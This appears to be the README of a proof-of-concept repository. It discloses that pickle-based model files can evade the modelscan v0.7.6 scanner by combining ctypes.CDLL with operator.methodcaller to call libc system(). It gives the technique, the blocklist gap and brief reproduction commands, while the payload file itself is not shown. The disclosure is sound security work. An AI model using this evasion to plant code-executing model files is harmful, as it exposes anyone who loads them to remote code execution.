| license: mit | |
| # ModelScan Bypass PoC — ctypes.CDLL + operator.methodcaller | |
| Demonstrates that `ctypes.CDLL` combined with `operator.methodcaller` bypasses modelscan v0.7.6 for native code execution. | |
| ## Vulnerability | |
| - `ctypes.CDLL(None)` loads the default C library (libc) | |
| - `operator.methodcaller("system", b"cmd")` calls `.system(cmd)` on any object | |
| - Combined: executes arbitrary shell commands via libc's `system()` function | |
| - Neither `ctypes` nor `operator.methodcaller` are in modelscan's blocklist | |
| ## Impact | |
| Native RCE — bypasses Python exec entirely. Calls libc system() directly via ctypes FFI. This is the most dangerous variant as it cannot be mitigated by Python-level sandboxing. | |
| ## Reproduction | |
| ```bash | |
| pip install modelscan==0.7.6 | |
| modelscan scan -p pytorch_model.bin | |
| # Output: No issues found | |
| python3 -c "import pickle; pickle.load(open('pytorch_model.bin','rb'))" | |
| # Executes arbitrary shell commands via libc | |
| ``` | |